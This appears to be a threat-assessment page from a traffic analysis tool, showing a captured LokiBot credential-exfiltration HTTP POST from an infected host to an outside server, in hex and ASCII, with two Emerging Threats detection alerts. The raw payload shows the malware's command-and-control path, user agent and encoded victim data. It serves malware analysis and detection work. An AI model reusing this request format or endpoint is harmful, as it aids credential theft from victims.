« Back to Threat Assessment « Previous Threat | Next Threat »

LokiBot Application/Credential Data Exfiltration Detected M2 detected in 2017-11-21-traffic-analysis-exercise-2-of-6.pcap

Time Packet Protocol Source Destination Additional Threats
2017/11/21 00:13:59 +0000 15198 HTTP / tcp 10.192.1.157:49288 185.118.166.155:80 source | dest | ip pair

Payload (476 bytes) show as: hex | ascii | follow stream

00000000 00000010 00000020 00000030 00000040 00000050 00000060 00000070 00000080 00000090 000000A0 000000B0 000000C0 000000D0 000000E0 000000F0 00000100 00000110 00000120 00000130 00000140 00000150 00000160 00000170 00000180 00000190 000001A0 000001B0 000001C0 000001D0
50 4f 53 54 20 2f 77 70  2d 61 64 6d 69 6e 2f 63 73 73 2f 63 6f 6c 6f 72  73 2f 62 6c 75 65 2f 50 61 6e 65 6c 2f 66 69 76  65 2f 66 72 65 2e 70 68 70 20 48 54 54 50 2f 31  2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20  4d 6f 7a 69 6c 6c 61 2f 34 2e 30 38 20 28 43 68  61 72 6f 6e 3b 20 49 6e 66 65 72 6e 6f 29 0d 0a  48 6f 73 74 3a 20 74 63 6f 6f 6c 6f 6e 6c 69 6e  65 2e 6d 6f 62 69 0d 0a 41 63 63 65 70 74 3a 20  2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70  65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f  63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e  74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 62  69 6e 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 4b  65 79 3a 20 45 41 30 35 35 37 36 34 0d 0a 43 6f  6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30  34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63  6c 6f 73 65 0d 0a 0d 0a 12 00 27 00 00 00 07 00  00 00 63 6b 61 76 2e 72 75 01 00 1a 00 00 00 68  00 65 00 6e 00 72 00 79 00 2e 00 6a 00 6f 00 68  00 6e 00 73 00 6f 00 6e 00 01 00 14 00 00 00 57  00 49 00 4e 00 2d 00 44 00 35 00 32 00 34 00 33  00 42 00 01 00 14 00 00 00 57 00 49 00 4e 00 2d  00 44 00 35 00 32 00 34 00 33 00 42 00 00 05 00  00 d0 02 00 00 01 00 00 00 00 00 06 00 01 00 01  00 6b 00 00 00 01 00 00 00 00 00 00 00 00 00 00  00 01 00 30 00 00 00 34 00 46 00 45 00 42 00 38  00 43 00 39 00 43 00 37 00 32 00 33 00 38 00 37  00 35 00 37 00 31 00 42 00 41 00 42 00 30 00 44  00 44 00 36 00 46 00 05 00 00 00 6a 65 35 65 6f  00 00 00 00
POST /wp -admin/c ss/color s/blue/P anel/fiv e/fre.ph p HTTP/1 .0..User -Agent:  Mozilla/ 4.08 (Ch aron; In ferno).. Host: tc oolonlin e.mobi.. Accept:  */*..Con tent-Typ e: appli cation/o ctet-str eam..Con tent-Enc oding: b inary..C ontent-K ey: EA05 5764..Co ntent-Le ngth: 20 4..Conne ction: c lose.... ..'..... ..ckav.r u......h .e.n.r.y ...j.o.h .n.s.o.n .......W .I.N.-.D .5.2.4.3 .B...... .W.I.N.- .D.5.2.4 .3.B.... ........ ........ .k...... ........ ...0...4 .F.E.B.8 .C.9.C.7 .2.3.8.7 .5.7.1.B .A.B.0.D .D.6.F.. ...je5eo ....

2 Alerts

Alerts provided by Emerging Threats 2022-04-08
Signature Category SID.rev Rule Set
1 LokiBot Application/Credential Data Exfiltration Detected M2 A Network Trojan was detected 2024317.3 ET MALWARE
1 LokiBot Application/Credential Data Exfiltration Detected M1 A Network Trojan was detected 2024312.3 ET MALWARE

External References

There are no references available for these alerts.

Community ID

Community ID is an open standard for hashing network flows into identifiers and can be used to correlate connections across different tools.

Zeek: conn.log: 1:AuNn9vwZBdd/aoP9f7+UlmtGdUY=